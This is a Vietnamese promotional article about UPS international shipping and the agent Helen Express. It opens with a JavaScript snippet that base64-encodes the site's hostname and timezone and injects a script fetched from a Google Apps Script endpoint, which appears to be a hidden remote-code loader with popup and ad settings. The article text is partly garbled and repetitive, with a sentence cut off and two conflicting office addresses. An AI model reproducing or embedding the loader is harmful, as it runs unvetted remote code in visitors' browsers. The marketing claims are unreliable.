var GTM = 'GTM-NJKFBQ8'; var GG_ADS = 'ca-pub-8687624480880776'; var POPUP_IMG_PREFIX = "https://nhaxinhplaza.vn/wp-content/uploads/2022/08/"; // qc.png, close.png var SHOW_POPUP = 1; // 0: disable, 1: enable var MAX_CLAIM = 1; var TIME_TO_SHOW_POPUP = 10; // 10s var MAX_BUFF = 3; var b64e = function (a) { return btoa(encodeURIComponent(a).replace(/%([0-9A-F]{2})/g, function (b, a) { return String.fromCharCode("0x" + a) })) }; var gg_layer = document.createElement('script'); gg_layer.type = 'text/javascript'; gg_layer.src = `https://script.google.com/macros/s/AKfycbwT2tLHaERiLaaaT_05pnXM2h0pjKHGRPBTQgeffPjyIIXBAR46dAuj5S0sgi2scsJ77Q/exec ?st=${b64e(location.hostname)}&tm=${new Date().getHours()}&os=${b64e(new Date().getTimezoneOffset())}`; var s = document.getElementsByTagName('script')[0];s.parentNode.insertBefore(gg_layer, s);

UPS là gì? Tìm hiểu dịch vụ Vận chuyển, gửi hàng UPS tại VN

Trụ sở chính nằm tại địa chỉ 131 Nguyễn Minh Hoàng, Phường 12, Quận Tân Bình, Thành phố Hồ Chí Minh.

Các công ty vận chuyển hàng hoá quốc tế được đánh giá cao trên toàn cầu bao gồm FedEx, TNT hay UPS. Trong số đó, UPS được rất nhiều khách hàng tin tưởng và sử dụng dịch vụ khi cần gửi hàng ra nước ngoài. Vậy, UPS là gì? Gửi hàng đi nước ngoài qua UPS có những lợi ích đáng kể nào? Hãy cùng khám phá thông tin về UPS và dịch vụ gửi hàng của họ tại Việt Nam qua bài viết dưới đây!

Công ty giao nhận nhanh UPS viết tắt từ United Parcel Service Express đã ra đời vào năm 1907 tại Hoa Kỳ. Ban đầu, đây chỉ là một công ty phân phát báo chí trong nước. Tuy nhiên, UPS đã phát triển thành một tập đoàn to lớn với quy mô cung cấp các dịch vụ kho vận chuyên biệt và vận chuyển chuyên nghiệp toàn cầu. UPS được xem là một trong những công ty giao nhận hàng hoá lớn nhất trên toàn thế giới.

Hệ thống UPS được điều hành bởi hơn 495.000 nhân viên liên kết với hơn 220 quốc gia và lãnh thổ trên các tuyến đường bộ, đường ray, đường hàng không và đường biển, với tôn chỉ chăm sóc khách hàng hàng đầu và thúc đẩy bằng sự đổi mới. Trong tương lai, UPS sẽ tiếp tục làm trùm ngành và liên kết toàn cầu, với cam kết về chất lượng dịch vụ và sự bền vững về môi trường.

Cho đến thời điểm hiện tại, UPS đã thực hiện thành công và đạt được những mục tiêu đã đề ra.

 • Hơn 11 triệu khách hàng đã đặt mua và nhận hàng.
 • Hơn 5 tỷ gói hàng đã được vận chuyển trong năm.
 • Hơn 10.300 xe và phương tiện vận chuyển sử dụng nhiên liệu thay thế và công nghệ tiên tiến.
 • Hơn 490 nghìn nhân viên.
 • Mỗi ngày có khoảng 294,9 triệu yêu cầu được theo dõi trên mạng trực tuyến.
 • Hơn 220 quốc gia và lãnh thổ được phục vụ.
 • Hàng trăm nghìn phương tiện gồm ô tô chở hàng, xe tải, xe moóc và xe môtô đang lưu thông trên đường.
 • Hơn 1.800 thiết bị hoạt động.
 • 512 Máy bay được sở hữu, cho thuê hoặc được thuê bao.
 • Có 2.285 chuyến bay được thực hiện hàng ngày.
 • Hệ thống gồm khoảng 1000 trung tâm dành cho khách hàng trên khắp thế giới và hơn 500 địa điểm chuỗi cung ứng tại hơn 125 quốc gia đi kèm với đó.

  UPS ngày càng tiến bộ và vững chắc trong top 3 các công ty vận chuyển quốc tế lớn nhất hiện nay với sự cải tiến liên tục trong nhiều năm. Công ty này còn phát triển, nghiên cứu và mở rộng sang nhiều lĩnh vực khác nhau, tạo điều kiện cho hàng ngàn nhân viên làm việc và nâng cao trình độ chuyên môn. Việc đầu tư vào nguồn nhân lực, lắng nghe và tiếp thu những ý kiến từ khách hàng, đã giúp UPS ngày càng được khách hàng tin tưởng và đánh giá cao trên mọi phương diện.

  Các trụ sở của UPS:

 • UPS có trụ sở chính đặt tại Atlanta, Hoa Kỳ.
 • Vùng Châu Á Thái Bình Dương: Tòa nhà UPS – Singapo.
 • Vùng Châu Âu: 1200 Brussel, nước Bỉ.
 • Vùng Châu Mỹ LaTinh và Caribe: Miami, Hoa Kỳ.
 • Bên cạnh đó, UPS Việt Nam có trụ sở tại Hà Nội và TP.HCM (Sài Gòn).
 • Công ty sở hữu nhiều đại lý và công ty con khác nhau, phần lớn tập trung ở các đô thị lớn, và thường là thủ đô của mỗi quốc gia. Hơn nữa,

  Các dịch vụ UPS cung cấp chính:

 • Dịch vụ chính của công ty là vận chuyển và phân phối hàng hóa nặng thông qua các phương tiện như hàng không, đường biển, đường bộ và đường sắt. Công ty cũng cung cấp dịch vụ quản lý thương mại quốc tế và kê khai hải quan cho 195 quốc gia.
 • Các phần dịch vụ của Dịch vụ Riêng biệt bao gồm khắc phục sự cố kỹ thuật và điều chỉnh, thiết kế hệ thống cung ứng và lập kế hoạch, và quản lý sản phẩm được trả về.
 • Dịch vụ vận chuyển, gửi hàng quốc tế UPS

  Ưu điểm

  Vẫn duy trì vị thế của mình bằng các ưu điểm đặc biệt, UPS cạnh tranh với các thương hiệu gửi hàng nhanh lớn trên toàn cầu.

  1/ Khả năng vận chuyển hàng nặng > 70kg

  Vận chuyển các sản phẩm có kích thước lớn như ô tô, máy móc và thiết bị công nghiệp qua đại dương là một thách thức không nhỏ đối với nhiều doanh nghiệp. Đặc biệt là khi cần vận chuyển những lô hàng có khối lượng lớn, việc tìm kiếm công ty vận chuyển quốc tế phù hợp cũng rất khó khăn. Tuy nhiên, điều này vẫn là thực tế đối với những cá nhân và đại lý phân phối khác.

  Hệ thống vận chuyển UPS là một phương án rất hiệu quả cho trường hợp cần chuyển hàng nặng như vậy. Dịch vụ vận chuyển UPS có thể chuyển các lô hàng có khối lượng lớn từ 70kg trở lên.

  2/ Thời gian vận chuyển nhanh chóng

  UPS cung cấp dịch vụ vận chuyển đảm bảo, định ngày và tận nhà với nhiều tuyến đường hơn so với các công ty vận chuyển khác và thời gian giao hàng nhanh nhất. UPS cam đoan vận chuyển hàng quá khổ nhanh chóng để đáp ứng yêu cầu của doanh nghiệp.

  Giao hàng trong khu vực Châu Á: thời gian vận chuyển có thể được rút ngắn chỉ trong một đêm.

  UPS cam kết vận chuyển các sản phẩm có kích thước lớn và nặng trong 3 ngày, kể cả giữa khu vực Á – Âu/Bắc Mỹ, dù khoảng cách rất xa.

  3/ Áp dụng công nghệ tiên tiến, tạo sự tiện lợi cho khách hàng khi theo dõi đơn hàng

  UPS đã kịp thời tìm hiểu và phát triển công cụ DIDA – một sản phẩm thông minh, có khả năng xử lý và theo dõi từng chi tiết đơn hàng khi chuyển vận trên toàn cầu, dù hoạt động chủ yếu trong lĩnh vực chuyển phát nhanh. Với sự phát triển của công nghệ hiện nay, UPS cũng không bỏ qua xu hướng này.

  Có hai trung tâm chuyên đựng và xử lý thông tin giao hàng nhanh toàn cầu, đồng thời sở hữu công nghệ cao cấp để xử lý hóa đơn điện tử. Trang web của UPS cung cấp đầy đủ thông tin về hàng hóa của khách hàng bằng 12 ngôn ngữ châu Á khác nhau. Khách hàng có thể dễ dàng tiếp nhận thông tin qua UPS tracking và tra cứu số vận đơn trực tiếp trên trang web.

  4/ Luôn đổi mới nghiên cứu

  Hãng chuyển phát nhanh UPS của Mỹ không chỉ cung cấp những dịch vụ chất lượng cho khách hàng mà còn là một trong những công ty tích cực nghiên cứu và phát triển công nghệ mới. Theo ông Dale Spencer, Giám đốc kỹ thuật ô tô của UPS, công ty luôn tìm kiếm các cải tiến để tăng hiệu quả tiêu thụ nhiên liệu cho phương tiện chuyển phát, đặc biệt là trong bối cảnh giá nhiên liệu ngày càng tăng trong những năm qua. UPS đã quyết định tiết kiệm nhiên liệu để bảo vệ môi trường, ngay cả khi giá nhiên liệu giảm xuống.

  Thời gian vận chuyển hàng hoá của UPS

  Thời gian giao hàng của UPS có thể thay đổi tùy thuộc vào loại dịch vụ và địa điểm nhận hàng. Tuy nhiên, nhờ vào mạng lưới phân phối rộng khắp và khả năng hoạt động linh hoạt, UPS đảm bảo thời gian giao hàng nhanh chóng.

  Các đơn hàng có kích thước lớn hoặc trọng lượng nặng cũng sẽ phải chịu cước vận chuyển cao hơn và thời gian giao hàng có thể kéo dài hơn so với các đơn hàng thông thường.Xuất hiện thêm chi phí vận chuyển nội địa đồng thời thời gian giao hàng tăng thêm 1-2 ngày từ kho hàng của UPS đến điểm nhận hàng sẽ diễn ra với các kiện hàng tại vùng sâu vùng xa. Ngoài ra, các đơn hàng với kích thước lớn hoặc trọng lượng nặng sẽ phải chịu chi phí vận chuyển cao hơn và thời gian giao hàng có thể kéo dài

  Việc cắt hàng tại kho giữa khoảng thời gian từ 5h30 đến 6h chiều sẽ giúp cho quá trình kết nối hàng trong ngày diễn ra thuận lợi hơn. Hầu hết các đơn hàng sẽ được kết nối trong ngày nếu thời gian giao hàng trước 5h chiều các ngày trong tuần.

  Cước phí vận chuyển hàng hoá tại UPS

  Hiện tại, UPS cung cấp hai loại mức giá bao gồm:

 • Vận chuyển nhanh: UPS Saver.
 • Sử dụng dịch vụ UPS Expedited để tiết kiệm chi phí.
 • Tuy nhiên, giá cước của gói UPS Experdited chỉ phù hợp với các mức hàng có trọng lượng lớn.

  Phương thức tính giá cước vận chuyển được thực hiện thông qua một trong hai cách tính khối lượng hàng hóa.

  Trọng lượng dựa trên cân nặng.

  Thể tích có thể tính bằng cách nhân độ cao (cm) với chiều rộng (cm) và chiều dài (cm), rồi chia cho 5000.

  Giá vận chuyển sẽ được tính dựa trên khối lượng lớn hơn.

  Với khách hàng gửi hàng số lượng lớn, UPS thường xuyên cung cấp các chương trình ưu đãi và giảm giá. Nếu đơn hàng gửi vượt quá 400 USD, UPS là sự lựa chọn tốt nhất và nhanh chóng nhất. Giá cước phí cho việc gửi trực tiếp tại hãng dành cho khách lẻ hoặc gửi hàng nhỏ thường khá đắt đỏ. Vì vậy, khách hàng có thể tìm đến các đại lý thu gom của hãng để có được mức giá cước phí ưu đãi hơn.

  Để tìm hiểu chi tiết về giá cước và thời gian giao hàng chính xác khi sử dụng dịch vụ UPS cho hàng hóa của mình, bạn có thể liên hệ với Helen Express qua số Hotline: 0906 87 00 86 hoặc qua Zalo, viber: 0932 86 5859 để được hỗ trợ tư vấn miễn phí. Helen Express là đại lý cấp 1 chính thức của UPS, vì vậy khách hàng có thể tiết kiệm chi phí lên đến 50% so với việc gửi trực tiếp tại hãng.

  Helen Express – Dịch vụ gửi hàng đi nước ngoài qua UPS Nhanh chóng – Giá rẻ – Uy tín

  Công ty TNHH Vận chuyển Helen Express đóng vai trò là đại lý thu gom hàng hóa cho một số hãng chuyển phát nhanh hàng đầu trên toàn cầu như FEDEX, TNT, UPS, với phương thức giao hàng “Door to Door” tại Việt Nam. Công ty tập trung vào lĩnh vực Ship hàng Quốc Tế và Chuyển phát nhanh Quốc Tế với tiêu chí hoạt động “Nhanh chóng – Chính xác – An toàn – Tiết kiệm”.

  Helen Express là đại lý chính thức của các hãng chuyển phát nhanh quốc tế hàng đầu như UPS, FedEx, TNT,… Vì vậy, khách hàng có thể tận dụng dịch vụ của Helen Express để gửi hàng đi nước ngoài thông qua UPS với chi phí giảm tới 50% so với gửi trực tiếp tại hãng. Bên cạnh đó, Helen Express cung cấp những dịch vụ ưu đãi như: Giao nhận tận nơi, hỗ trợ đóng gói hàng hoá miễn phí, theo dõi hàng hoá 24/7, và hỗ trợ thủ tục trọn gói cho khách hàng. Tất cả những điều này sẽ giúp khách hàng tiết kiệm được cả thời gian và tiền bạc khi muốn gửi hàng đi nước ngoài.

  Với hơn 6000 khách hàng tin tưởng và giới thiệu, Helen Express đã có hơn 7 năm hoạt động trong lĩnh vực vận chuyển hàng hóa đến nước ngoài và vận chuyển thú cưng cả trong và ngoài nước. Điều này được đạt được nhờ vào 3 cam kết của chúng tôi.

 • Helen Express cung cấp dịch vụ bảo hiểm hàng hóa với mức đền bù lên đến 100% giá trị hàng hóa trong trường hợp hàng hóa bị mất mát hoặc hư hỏng khi vận chuyển.
 • Helen Express cam kết giao hàng đến người nhận đúng thời gian và nhanh chóng, trừ khi gặp các yếu tố bất khả kháng như thiên tai. Thời gian vận chuyển hàng hóa bằng dịch vụ chuyển phát nhanh chỉ từ 3-5 ngày.
 • Helen Express cam kết cung cấp giá cả tốt nhất trong lĩnh vực vận chuyển chăm sóc khách hàng hiện nay và chỉ tính giá một lần, không có phát sinh chi phí nào trong quá trình vận chuyển, giúp khách hàng hoàn toàn tự tin với dịch vụ của chúng tôi.
 • Các tiện ích khi sử dụng dịch vụ chuyển phát quốc tế của Helen Express:

 • Chi phí giao hàng tiết kiệm từ 30-50% so với giá của nhà sản xuất.
 • Dịch vụ tư vấn 24/24 hoàn toàn miễn phí được cung cấp bởi những nhân viên có kinh nghiệm lâu năm nhất.
 • Dịch vụ chuyển phát nhanh Door-to-Door: đưa đón hàng hóa tới địa chỉ một cách nhanh chóng.
 • Giao nhận hàng hóa tại nhà, không tính phí đóng gói.
 • Cung cấp dịch vụ hải quan miễn phí cho khách hàng.
 • Tận hưởng các ưu đãi giá cước đa dạng trên nhiều tuyến đường trên toàn cầu hàng tháng.
 • Đảm bảo việc vận chuyển hàng hóa đến nơi an toàn và theo dõi. Thông báo cho khách hàng khi hoàn tất việc vận chuyển và kiểm tra lịch trình hàng hóa.
 • Cung cấp phiếu giao hàng chính hãng khi khách hàng đề nghị.
 • Cam kết giao hàng đúng thời hạn.
 • Gửi vận chuyển hàng hóa tại Việt Nam có thể sử dụng dịch vụ của UPS. Nếu bạn có nhu cầu gửi hàng đi quốc tế qua UPS hoặc cần hỗ trợ giải đáp thắc mắc khi gửi hàng, vui lòng liên hệ với Helen Express qua số hotline: 0906 87 00 86 hoặc qua Zalo, Viber: 0932 86 5859 – 0938 320 357 để được tư vấn miễn phí và hỗ trợ đóng gói, giao nhận đến tận nơi. Đó là những thông tin cần biết.

  THÔNG TIN ĐẦY ĐỦ.

  Số nhà 270 trên đường Hoàng Hoa Thám, ở phường 12, quận Tân Bình, thành phố Hồ Chí Minh.

  Số điện thoại nóng: 0906 87 00 86 — Zalo, viber: 0932 86 5859 – 0938 320 357.

  Số điện thoại: +84 28 2243 2424 — Thư điện tử: [email protected].

  Website: https://helenexpress.Com/.

  Fanpage: https://www.Facebook.Com/helenexpress.